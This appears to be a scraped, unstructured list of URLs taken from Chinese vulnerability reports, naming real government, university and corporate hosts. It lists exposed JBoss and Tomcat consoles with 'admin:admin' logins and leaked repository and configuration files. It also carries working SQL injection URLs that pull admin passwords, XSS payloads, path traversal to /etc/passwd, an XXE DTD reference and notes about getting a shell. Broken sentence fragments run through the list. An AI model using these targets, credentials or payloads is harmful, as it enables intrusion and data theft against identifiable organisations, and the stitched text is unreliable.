http://archives.shsmu.edu.cn:7001/jdyxyinfoplat/WebRoot/platformData/infoplat/pub/jdyxy_2522/xyrw/jdyxy_fifth_more_new1.jsp?id=58 http://fans.hisense.com/default.php inurl:ecdomain http://www.cl.yn.gov.cn/topic.aspx?tid=4 http://www.phpyun.com/主站存在nginx解析漏洞,通过主站下的论坛头像上传功能,可直接上传图片马获取主站系统控制权限,并可获得论坛近两万用户的信息。 http://210.75.20.140:5001/anyeye/ http://210.75.20.140:5001/jmx-console http://210.75.20.140:5001/web-console http://210.75.20.140:5001/invoker/JMXInvokerServlet http://tj.fruitday.com/ http://mail.pipi.cn/ http://oa.ccoopg.com/ http://218.202.254.215:8080/jybz/login.action 
http://218.202.254.215:8080/admin-console http://www.06330633.net/ http://hotels.yonyou.com/ajax_action/get_chain?chainid=115&cityid=0101 http://xm.597.com/Recruit/chqycx.aspx?nid=VR150330115534 http://**.**.**/bill/js/test.gbk.jsp http://www.mvmmall.cn/down.html http://localhost/free/ajax.php?action=readmsg&uid=2&_=1429680053436 http://oms.fruitday.com/users/login www.casio.com.cn http://wo.gx10010.com/index.html http://www.jushanghui.com/ http://www.wooyun.org/corps/海尔集团 http://hotels.yonyou.com/hotelmaplist/index.html?cityid=0101&h=340&ids=17996,129696,21117,26147,126559,124890,103431,17994,146306,146302,128908,145772,146286,146180,17995&juli=&px=3&w=760 http://202.96.11.45 http://202.96.11.45/jmx-console/ http://202.96.11.45/DonGz/index.jsp http://202.96.11.48/SmartLearning/ http://202.96.11.46/KinmetFutures/login.jsp http://video2.duxiu.com/recommendlist.asp?pg=1 http://project.rong360.com/twiki/bin/view/Main/WebHome。 http://review.ttpod.com/.git/config com:ttpod/review-ttpod-com.git http://pim.hn165.com http://pim.hn165.com/admin/ http://www.sctv.com http://lvyou.baidu.com/notes/705006f538fa0fd1185fb63a?pos=5### http://gjzx.cumt.edu.cn:8080/SoMooc/viewSpace.action?userid_visited=5b5ba3f74a4b8dd2014a5246d0b70016 http://mail1.citic.com/admin/ eyouuser:eyou_admin http://ydlb.gwng.edu.cn:8080/SoMooc/viewSpace.action?userid_visited=297edff84c69d78c014c78efad4a003c http://fangvip.ganji.com/hr_v2/?c=Auth&a=login http://218.104.169.74:8080/Lams/ http://114.255.63.24/admin/login.html http://www.jxvw.com/ http://xb.imnu.edu.cn/manage/node_article_add2.asp?menu=addnewss&qikan_id=237&node_id=1 http://www.hzng.cn/dzb/manage/node_article_add2.asp?menu=addnewss&qikan_id=20&node_id=1 http://epaper.jxut.edu.cn/manage/node_article_add2.asp?menu=addnewss&qikan_id=280&node_id=1 http://www.sxgjdl.com:8181//manage/node_article_add2.asp?menu=addnewss&qikan_id=250&node_id=1 http://cy.jxstnu.cn/new/jxkjsf/manage/node_article_add2.asp?menu=addnewss&qikan_id=350&node_id=1 
http://www.viewgood.cn/channels/4.html http://wlsp.zzuli.edu.cn/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://zhibo.jsedu.sh.cn/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://media.maslib.com.cn:81/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://14.23.108.4:81/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://vod.xmedu.cn/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://pms.suning.com.cn/ http://pms.suning.com.cn/zentao/extension-browse.html http://125.35.6.121/upload/index.jsp发现是个马,但是没密码咋整? http://222.185.229.85/index.php https://ssl.hisense.com/+CSCOE+/portal.html http://drops.wooyun.org/papers/3451 http://oos.yundasys.com/login.php http://jwgl.gxu.edu.cn/ http://jwgl.gxu.edu.cn/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://demo.ourphp.net http://demo.ourphp.net/?cn-shoppingcart.html-&ourphp_cms=shopping http://statistics.eloancn.com/ http://2015.cert.org.cn/index.html这里看到的会议信息,然后上面有一个注册会议。点击注册会议后跳转到了31会议网。 http://event.31huiyi.com/29647621 http://www.shcdkf.com/ http://www.shcdkf.com/cwc/KFweb/admin/StudentPassword.aspx http://weixin.cnu.edu.cn/wx/gzyy/data_service.aspx?method=Student_Reg&id=1120200002 http://user.mmbao.com/findPassword.html http://kxfz.qndj.gov.cn/invoker/JMXInvokerServlet http://jd.gd.gov.cn/invoker/JMXInvokerServlet http://jadjw.jinan-fz-fj.gov.cn/invoker/JMXInvokerServlet http://hd.221.gov.cn/invoker/JMXInvokerServlet http://jpkc.njit.edu.cn/invoker/JMXInvokerServlet http://cst.gzu.edu.cn/invoker/JMXInvokerServlet http://www.1218.com.cn/administrator.php/common/login/index.php?back=http://www.1218.com.cn/administrator.php http://rel.lenovo.com.cn/zhaoyang/admin/index.php http://rel.lenovo.com.cn/zhaoyang/admin/excel.php http://rel.lenovo.com.cn/zhaoyang/admin/excel_ios.php http://220.171.31.78:8000/hsfk/ 
http://220.171.31.78:8000/czcykt/ http://220.171.31.78:8000/admin-console https://122.228.153.103/exchange/login.htm?loginMemberVo.memberType=1 https://122.228.153.103/jmx-console/ http://sms.ckair.com http://122.225.117.68/zhongtian.zto,发现可以Post http://221.178.186.19 http://www.cpbao.com http://www.cpbao.com/user/fund!bindMobileOrEmail.action?userIdCard=4467239&isBindEmail=1&bindEmail=10001@qq.com url:http://218.28.26.147:8081/manager/html user:admin pass:admin http://www.gzsewing.com http://www.125309.com http://www.nm3g.org http://35dianqi.com http://www.ai04.com http://www.longmm.net http://www.99pwan.com http://www.heimawg.com http://www.hzjdpm.cn http://ptwb.net http://5lmm.cn http://www.125309.com/admin/dingdan_sendnot.asp url:http://220.162.244.35:8081/manager/html user:admin pass:admin http://icc.yeepay.com http://icc.yeepay.com/about/CVS/Root pserver:ye.tian@192.0.0.173:/home2/cvsroot index.html/1.4/Mon 3.code/YP2G_ROOT/ROOT.war/about url:http://222.35.103.226:8081/manager/html user:admin http://www.bass.gov.cn/ http://vpn.bass.gov.cn/ http://61.154.135.18:8099/PTSC/login.action http://61.154.135.18:8099/PTSC/login.action http://**.**.**/index.jsp搜索栏处存在搜索型SQL注入漏洞_ http://ub1.nslm.g.baofeng.com/ http://ub1.nslm.g.baofeng.com/test/gd.php http://222.210.17.165:80/selects.asp?Key=88888 www.21cnedu.com http://study.21cnedu.com/default.aspx http://study.21cnedu.com/cneduschool/upload/school/440304123456/homeworkinfo/087010101/201542222224671371.asp http://m.suning.com.cn:8001/install/ http://m.suning.com.cn:8001/install/InstallSysAdmin.aspx http://fws.youshang.com/sso/sendRedirect.action http://rel.lenovo.com.cn/zhaoyang/admin/index.php http://rel.lenovo.com.cn/zhaoyang/admin/ ftp://122.112.16.233 http://cht.citic/trc/www.travel.citic.com/enterprise_news_details.jsp?docid=4275 http://cht.citic/trc/www.travel.citic.com/visaDetail.jsp?visaid=1701 http://cht.citic/trc/www.travel.citic.com/shipList.jsp?shipid=1240 
http://customer.cs.ecitic.com/hr/positionAction.do?url=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&extendUrl=type%3D05&type=05&method=listPositionByPageFromIndex http://www.travel.citic.com/route_search.jsp?travelType=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/route_search.jsp?travelType=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/route_detail.jsp?routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/route_search.jsp?regionId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/orderSuccess.jsp?routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/shipList.jsp?shipid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/login.jsp?ut=yd&pid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/visaDetail.jsp?visaid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/shipDetails.jsp?routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/orderSuccess.jsp?ptype=3&routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/news/news!newsList_front.action?newsClassName=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/common/error.jsp?url=%2Fpage%2Fmanager&error=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/export/export!addExport_front.action?status=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/message/message!addMessage_front.action?status=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://customer.cs.ecitic.com/hr/positionAction.do?url=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&extendUrl=type%3D05&type=05&me https://creditcard.ecitic.com/citiccard/scrm/readme.txt http://bgxf.people.com.cn http://win.999.com.cn/pic.asp?cp_id=188 https://txzb.miit.gov.cn/EC/DM/ECDM0104.jsp?filePath=/etc/passwd&originalFilename=passwd http://www.xiangshe.com/ http://**.**.**/ddqt/_ 
http://**.**.**/ddqt/notice/_ http://**.**.**/fckeditor/_ http://pingan.hylinkad.com http://pingan.hylinkad.com/admin/admin.php http://pingan.hylinkad.com/phpmyadmin/setup/index.php http://61.182.231.214:8080/AHIS/Login/ http://61.182.231.214:8080/AHIS/PubFrame/UpFile.jsp http://gps.ha-online.cn/index.jsp http://testyun.hpwifi.com/sh2/login.do http://123.56.44.236:8888/ http://123.56.44.236:8192/ http://123.56.44.236:8192/shop/groupbuy_preferential.html?shopid=10293 http://123.56.44.236:8090/ http://123.56.44.236:8090/login.ftl http://123.56.44.236:8090/sapp/login.do http://123.56.44.236:8080/ http://123.56.44.236:8029/ http://123.56.44.236:8013/ http://123.56.44.236:8013/login http://123.56.44.236:7777/ http://hpwifi.com http://yun.hpwifi.com http://p.hpwifi.com http://ad.hpwifi.com http://partner.hpwifi.com http://back.hpwifi.com http://keaiduodcs.m.hpwifi.com http://testp.hpwifi.com http://faq.hpwifi.com http://back.hpwifi.com/back/m.do http://p.hpwifi.com/p/login.do http://partner.hpwifi.com/p/login.do http://ad.hpwifi.com/ad/login.do http://keaiduodcs.m.hpwifi.com/webapp/appindex_getArticleInfo.do http://yun.hpwifi.com/ http://123.56.44.236:8090/sys.jsp https://sso.jrj.com.cn/sso/retrievePwdEmail?rp_id=开头,后面的ID值是不确定的,而且有效时间是12小时,肿么快速定位这个ID呢,别着急,开发人员帮你解决,看下图: http://bugs.edaijia.cn/ http://i.m.yiche.com/ http://jy.nanning.gov.cn/zsgz/201107/t20110706_382640.html http://pcsb.ahau.edu.cn:8080/TCDB/teaAction_about.action?flag=2 http://pcsb.ahau.edu.cn:8080/TCDB/TMDBspectra.zip http://zt.duxiu.com/repository/repositoryMsg/repMsg.jspx?repid=87303 http://jwjg.sasac.gov.cn/login.jsp http://jwjg.sasac.gov.cn/login.action http://space.36kr.com/.git/config http://oa.qust.edu.cn/ http://121.11.160.122/invoker/JMXInvokerServlet http://www.imba.uestc.edu.cn/Administrator/admin_login.aspx http://www.ncl.uestc.edu.cn/main/index/view_article.php?id=1387 http://113.57.156.14:83/pm/ http://www.hhhtgjj.com.cn http://www1.drugadmin.com/flash_upload.php?modelid= 
http://oms.flnet.com/pages/ http://oms.flnet.com/pages/UserManager/UserPopedom.aspx http://oms.flnet.com/pages/UserManager/Passwordreset.aspx http://oms.flnet.com/pages/UserManager/m_depart_rule.aspx http://oms.flnet.com/pages/UserManager/ChangeRight.aspx http://218.92.28.26/local/admin/admin.asp https://183.129.160.195 https://github.com/joaomatosf/jexboss https://txzb.miit.gov.cn http://used.xcar.com.cn/index.php?carAge=0&cityId=0&color=0&displacement=0&gearbox=0&is_haveimg=0&is_newcar=0&is_sale=1&level=0&mileage=0&pbid=0&price=99&priceBetween[0]=25&priceBetween[1]=&provinceId=0&r=car/search&rank=0&type=0&vframe=0&pserid= http://www.examiner.com.tw/examHistory.php?id=163 http://58.210.227.74:82 http://58.210.227.74:82/web.zip http://lbj.cikuu.com/index.php?a=forceDownload&pdf=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&m=index http://dcrd.cikuu.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.citcc-4.com.cn/site3/index.php,通过手工尝试,发现存在phpmyadmin数据库管理工具,访问url:http://www.citcc-4.com.cn/phpmyadmin/index.php, http://www.citcc-4.com.cn/admin/leftframe.php,网站报错,网站根目录:D:\www\admin\leftframe.php http://www.citcc-4.com.cn/site3/index6.php http://admin.eryavideo.com/ http://sqlmap.org http://drops.wooyun.org/papers/3451 https://183.224.71.130/+CSCOE+/logon.html http://www.zmdjsw.gov.cn/jmqy/index.asp?type=82 http://218.26.248.201:8080/crm/ http://218.26.248.201:8080/invoker/JMXInvokerServlet,拿shell monitor.cern.ac.cn/login.html http://wap.yirendai.com/yixin/index.php http://218.16.100.212:8080/gionee/weibo/adminManager!login http://218.16.100.212:8080/gionee/weibo/adminManager!login http://218.16.100.212:8080/gionee/weibo/adminManager!login http://bbs.uc.cn/home.php?mod=spacecp http://www.whflsc.com/Web/Welfare/NewInfoList.aspx?channelname=%E9%80%9A%E7%9F%A5%E9%80%9A%E5%91%8A 
http://210.38.243.169:8080/automation/download.action?name=2013-10-17-15-54-29-2%E5%AF%B9%E8%B1%A1%E6%95%B0%E5%AD%A6%E6%A8%A1%E5%9E%8B.ppt&realname=2%E5%AF%B9%E8%B1%A1%E6%95%B0%E5%AD%A6%E6%A8%A1%E5%9E%8B.ppt LDAP://10.72.54.22:389/dc=china,dc=huawei,dc=com"/ http://localhost.huawei.com:23352/"/ http://3ms.huawei.com/hi/group/1002399/thread_3470599.html?mapId=1732761"/ http://10.69.27.138:8012/"/ https://vpn.btbu.edu.cn/ url:http://124.193.134.214:81/manager/html user:admin pass:admin http://124.193.134.214:81/com.csii.paramgmt.web/reLogin.do http://**.**.**.**/bugs/wooyun-2010-055323 http://202.99.63.183:8080/carbonregproject/login_getJichuShitiItemDetail.action?tblJichuShitiVO.id=2 www.guh-software.de http://27.115.87.18/jijie.shtml http://kc.hljit.edu.cn:8080/zyjh/qt!queryNewView.action?xwid=2 http://**.**.**/ https://**.**.** http://email.citic.com/ http://idc.hust.edu.cn/getNotificationById.php?notificationId=128或可脱裤 http://125.67.61.70:8080/dayunwuliu/login/doLoginOut.action www.77745.com http://www.77745.com//.svn/entries http://wo.weixin.qq.com:2013/ http://wo.weixin.qq.com:2014/ http://wo.weixin.qq.com:8091/ http://wo.weixin.qq.com:8090/ http://investor.skyworth.com/c/ir_circular.php?year=2007 http://app.skyworth.com/admin/ http://info.coocaa.net/CCShop/ShopAlliance/1920/images/znbg2.jpg/.php http://58.18.131.74:8080/xzsp_web/index/index!list.action http://ppcc.ruc.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://addon.discuz.com/?@ym_xinqing.plugin inurl:plugin.php?id=ym_xinqing http://60.10.25.25:8080/lfkjjh/index/index!index.do http://59.173.7.145:8080/bzpweb/pub_getPublicMain.action http://www.xilaikd.com/ ip:182.92.154.22 
http://www.skyworth-ea.com/sysadmin/login.aspx http://www.skyworth-ea.com//UploadFiles/main/Files/2015/4/20150424054233.aspx http://ssvideo.chaoxing.com/recommendlist.asp?order=1 http://sqlmap.org http://think.lenovo.com.cn:8080/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://ma.263em.com/callrecord!getCallRecord.action http://ma.263em.com/messagerecord!getMessagerecord.action http://ma.263em.com/billquery!ygzdmx.action?userid=test@domain.com&type=1&date= http://club.hydron.com.cn/admin/index.php/Index/index.html http://www.1218.com.cn/index.php/company/recruitment?location=%E6%B7%B1%E5%9C%B3&position=%E7%A0%94%E5%8F%91&type=44 http://www.bllib.net.cn:8080/ http://www.msit21.com/ http://202.197.107.11:86/ http://mail.tdsy.org/ http://163.21.191.31/ http://218.2.112.243:8080 http://122.227.160.98:8080/ http://122.225.192.136/ http://58.211.149.42:8000/otomc/user/loginUI.action http://120.194.143.10:8000/otomc/user/loginUI.action http://120.194.111.6:8000/otomc/user/loginUI.action http://120.194.223.10:8000/otomc/user/loginUI.action http://221.176.239.242:8000/otomc/user/loginUI.action http://221.176.177.170:8000/otomc/user/loginUI.action http://58.211.149.42:8000/otomc/user/loginUI.action为例 http://120.194.143.10:8000/otomc/user/loginUI.action http://120.194.111.6:8000/otomc/user/loginUI.action http://120.194.223.10:8000/otomc/user/loginUI.action http://ilife.homelink.com.cn http://apply.huawen.edu.cn/zsxt/editor/admin/login.jsp http://zsgl.usx.edu.cn:8007/zsxt/editor/admin/login.jsp http://whmzxy.cn:8050/zsxt//editor/admin/login.jsp http://218.89.137.19:8080/SCMS/site/luzhoutv/pd/ggpd/644648.shtml http://218.89.137.19:8080/invoker/JMXInvokerServlet,getshell http://kjxy.hrbcu.edu.cn/NewsListaspx.aspx?from=top&level=top&type=txt&Cid=5 
http://218.206.165.70:8080/customdev-qhwxcs/xn/hospital/chaxun.action?pageNow=2&medicalName=%E5%B8%82%E7%BA%A7%E5%AE%9A%E7%82%B9%E5%8C%BB%E7%96%97%E6%9C%BA%E6%9E%84%20&fixedPoint=0&areaPinyin=xining http://citiccard.228.com.cn/customer/forgotpassword.html club.chaoxing.com/bbs http://club.chaoxing.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%202%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://demo.74cms.com/android/jobs.php www.epsoft.com.cn/ http://122.227.89.140:8099/qzlss/ylbx1/ddyy.jsp http://122.227.89.140:8099/qzlss/ylbx1/zlml.jsp http://122.227.89.140:8099/qzlss/ylbx1/ypml.jsp http://122.227.89.140:8099 http://222.76.242.84:8083/zwzxsjjhpt/ http://www.aupu.net/plus/ http://sv.sdo.com http://wooyun.org/bugs/wooyun-2010-075231 http://www.hsort.com/ http://zsjggw.xnu.edu.cn/ http://p.hsort.com/ http://dztb.cufe.edu.cn/ http://epaper.btwhw.com/ http://www.yong-gang.com/ http://jx.swufe.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://210.29.144.172/sc8/page/schoolspace/course/academycourse-view.do http://skyclass.swpu.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://kcjs.ycit.cn/sc8/page/schoolspace/course/academycourse-view.doo http://skyclass.ypi.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://skyclass.xzgzy.cn/sc8/page/schoolspace/course/academycourse-view.do http://sky.hhu.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://skyclass.zufe.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://boss.tq.cn:8080/tqcrm/login.do jdbc:oracle:thin:@211.151.52.51:18051:tqdb02 jdbc:oracle:thin:@192.168.0.56:18051:tqdb02 http://demo.74cms.com/android/resume.php http://**.**.**/INFOADMIN/ewebeditor/_ http://**.**.**/INFOADMIN/ewebeditor/admin/upload.aspxid=5&dir=../../../_ 
http://**.**.**/AppConfig.xml_ http://**.**.**/AppConfig.xml_ http://**.**.**/Infoadmin/AppConfig.xml_ http://**.**.**/ewebeditor/admin/upload.aspxid=5&dir=../../../_ http://**.**.**/admin/ewebeditor/admin/upload.aspxid=5&dir=../../../_ http://**.**.**/infoadmin/ewebeditor/admin/upload.aspxid=5&dir=../../../_ http://**.**.**/index.aspx http://tieba.baidu.com/tb/static-itieba3/swf/itiebaVote.swf http://192.168.1.1/config.bin inurl:ecdomain http://www.mzsi.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://tagt.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.hecd.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.lnpj.hrss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.jlsgjj.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.sydpf.org.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.shaanxibzzf.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.ccfdw.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.gslz.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://cygjj.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.jlyb.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.lulong.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.tqyb.cc/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://dzh.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://wf.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.tj.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.hext.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.cygjj.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* 
http://jin.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://life.365jilin.com/html/2046119.shtml http://139.210.38.70/ http://xgc.ylsy.edu.cn http://www.cscline.com/ http://218.25.176.119:8080/e3/rbop/login.jsp http://218.25.176.119:8080/invoker/JMXInvokerServlet http://www.17u.net/travellist/linequeryJson http://citiccard.228.com.cn/personAlinForMation/deductintegrals http://221.239.120.214:8888/console/ http://218.16.100.212:8080/gionee/weibo/adminManager!login http://218.16.100.212:8080/admin-console http://www.springcocoon.com/AjaxCheck.aspx?f=1&GeneralID=127&cPwd=123456 http://www.wooyun.org/bugs/wooyun-2015-0110073/trace/a738240653a773676f3599ac0acf3e53 http://111.160.55.68:8080/invoker/JMXInvokerServlet http://61.181.252.74:8888/invoker/JMXInvokerServlet http://221.239.45.204:8888/invoker/JMXInvokerServlet http://222.66.158.208:9080/invoker/JMXInvokerServlet http://59.60.6.234/invoker/JMXInvokerServlet http://119.167.117.200:8080/invoker/JMXInvokerServlet http://180.169.85.107:9080/invoker/JMXInvokerServlet www.yqing.cn http://**.**.**/_ http://**.**.**/ http://**.**.**/ https://account.guokr.com https://www.itouzi.com/newuser/index/reg?ret_url=http%3A%2F%2Fwww.itouzi.com http://www.piaoyou.org/ http://demo.piaoyou.org http://oa.starstrip.net/ http://demo.piaoyou.org http://oa.starstrip.net/ http://www.yeehang.cc/ http://kq.4000211929.com/ http://sl.4000211929.com/ http://zw.jiritong.com/ http://dzy.4000211929.com/ http://oa.yccas.com/ http://hxd.4000211929.com/ http://wh.4000211929.com/ http://sdn.4000211929.com/ http://yps.4000211929.com/ http://yb.4000211929.com/ http://huanyu.4000211929.com/ http://jy.4000211929.com/ http://oa.wuzhouair.com/ http://lq.4000211929.com/ http://xiykh.4000211929.com/ http://cz.4000211929.com/ http://wdm.4000211929.com/ http://py.4008836868.com/ http://hnsc.4000211929.com/ http://asdsad/ http://www.228.com.cn/cart/modifyOrder.html?orderId=8990524 
http://www.228.com.cn/cart/modifyOrder.html?orderId=8990528 http://www.228.com.cn/cart/modifyOrder.html?orderId=8990536 http://www.228.com.cn/cart/modifyOrder.html?orderId=8990554 http://www.228.com.cn/cart/modifyOrder.html?orderId=8990568 http://www.1110086.com/ http://zz.1110086.com/ http://www.1110086.com/跳转到http://203.86.9.21/ http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n= http://wowdb.tgbus.com/itemSets.html?n= http://demo.74cms.com/android/login.php http://ilife.homelink.com.cn/aigou/?m=ProductList&a=seachProList&orderid=3 http://ilife.homelink.com.cn/aigou/?m=ProductList&a=seachProList&orderid=3 http://www.geodata.cn/Portal/metadata/downloadData.jsp?id=100101-38&isCookieChecked=true一试便知 http://www.dlgas.com/gas/news/readNews.jsp?id=20121012093857754一试便知 http://218.26.1.143:8080/dxswjc/login.jsp http://218.26.1.143:8080/admin-console,可通过部署war拿shell http://e.xdf.cn/Teacher/search www.edpbook.com.cn截图: http://www.edpbook.com.cn/admin.php http://www.5fax.net/ http://119.145.255.46:8888/ http://202.104.186.93/ http://113.105.225.250:8888/ http://211.154.136.8:8080/ http://113.105.225.250/ http://124.232.137.215/ http://202.105.179.216:8888/ http://202.105.179.171:8888/ http://202.104.186.94:8888/ http://www.fax400800.net/ http://www.51fax.com/ http://www.ltfax.net:8080/ http://www.baoyuefax.com/ http://fax998.cn/ http://www.02309.com/ http://www.hdf518.net/ http://www.258fax.com/ http://sz.mmfax.com/ http://www.518fax.cn/ http://www.168talk.net/ http://hi.fax10000.net/ http://258fax.com:8888/ http://www.zz.cn/xxgk/xxgkml_find.asp www.zz.cn http://weixin.jstv.com/index.php/top/login_index.php http://**.**.**/ http://dev.game.gionee.com/ http://www.xiaodao360.com//.svn/entries http://www.xiaodao360.com/xd2014.sql 
http://121.33.200.103:8080/front/Portal/list.do http://www.lib.ruc.edu.cn/webs/list/notice/53.html http://116.228.55.149:8082/helpdesk/privilege/loginAction!login2.action http://116.228.55.149:8082/helpdesk/jiushao.jsp jdbc:mysql://192.168.139.220:3306/helpdesk_g3 jdbc:mysql://192.168.139.220:3306/helpdesk_g3 jdbc:mysql://192.168.139.220:3306/helpdesk_g3_quartz resin:import http://card.118114.net:8080/sdm/ http://bbs.heilanhome.com/yaowen/168bjlzmw/ http://bbs.heilanhome.com/forumdata/cache/nst.php http://bbs.1006.tv/subject/ajax_subject_add_jing/?pub_id=30&subject_id=189148&uid_to=3179139 http://bbs.1006.tv/subject/ajax_subject_make_top/?pub_id=30&subject_id=18914&uid_to=3179139&top_sta=2 http://bbs.1006.tv/jifen/ajax_subject_score/?do_score=5&do_reason=1&pub_id=45&subject_id=188936&operate_id=1&uid_to=3179139 http://211.144.96.183:8080/anonymous/login.xhtml http://www.tnt.com.cn/ http://211.152.44.18:8080/coms/COwebsite/changeLocale.do http://get.appvv.com/ring/ring/search/s/ddd http://ring.appvv.com/search-dd'_1/ http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org http://www.roadmaint.cn:3333/ http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org http://cs.e-learning.haier.com:7001/console/ http://**.**.**/index.php/Public/login https://account.chsi.com.cn/account/preregister.action?from=archive-login http://s.zhulong.com//.svn/entries admin:language=cn go.hupu.com/u?url= CSRF:bbs回帖处 http://go.hupu.com/u?url=http://x.x.x.x/csrf.html http://www.skyworth-ea.com/cn/index.aspx http://www.skyworth-ea.com/cn/product/index.aspx?nodecode=105007001 http://www.skyworth-ea.com/cn/product/productdetail.aspx?id=100000087271587 http://www.skyworth-ea.com/en/search.aspx?val=a http://www.skyworth-ea.com/en/product/category.aspx?nodecode=105012001003 http://www.skyworth-ea.com/en/news/newsdetail.aspx?id=100000030389525&nodecode=105011001 http://www.fengniao.com/active/20091123_interview/list.php?type=1 http://es.gongchang.com//.svn/entries 
http://ar.gongchang.com//.svn/entries http://ar.gongchang.com/ http://t.cn/***** http://www.codoon.com/backend/newsfeed/comment_list http://www.codoon.com/backend/newsfeed/ http://www.njiairport.com:8001/ ftp://221.6.39.242/ ftp://221.6.39.242/tools/ ftp://221.6.39.242/tools/集成备份 com:haodai2013 com:haodai2013 com:lzm123456 http://114.141.189.90/ocs/AjaxCollectAction.action?cmd=downloadPdfFromLocal com:t***** com:t***** com:t***** http://localhost:9200/_nodes https://github.com/jiangjiangwei/ZTO,发现一处URL http://122.225.100.102:10000/GKPDA/commonPost.rubink file:///C:/Windows/win.ini http://ip/evil.dtd http://ip/?%file http://**.**.**/AskList.aspxkey=-1 https://wohovfor.worktile.com/calendar http://www.china-cgzb.com/first/firstAction_showJiChuXinXiSanJi http://www.china-cgzb.com/first/firstAction_showJiChuXinXiSanJi http://122.226.178.67:86/main/login.action http://122.226.178.67:86/ZFWH/system/login.action url:http://www.crcctc.com http://www.crcctc.com/webtj/admin_login.php url:http://gl.tiantianfm.com/apply.html http://gl.tiantianfm.com/request.html http://www.gxhzzyy.com/guestbook/index.php?keyid=phpcms http://www.952111.com/ http://esp.haier.com/CVS/Root url:http://www.cr126.com/index.aspx www.jlu.edu.cn。然后发现了网络中心 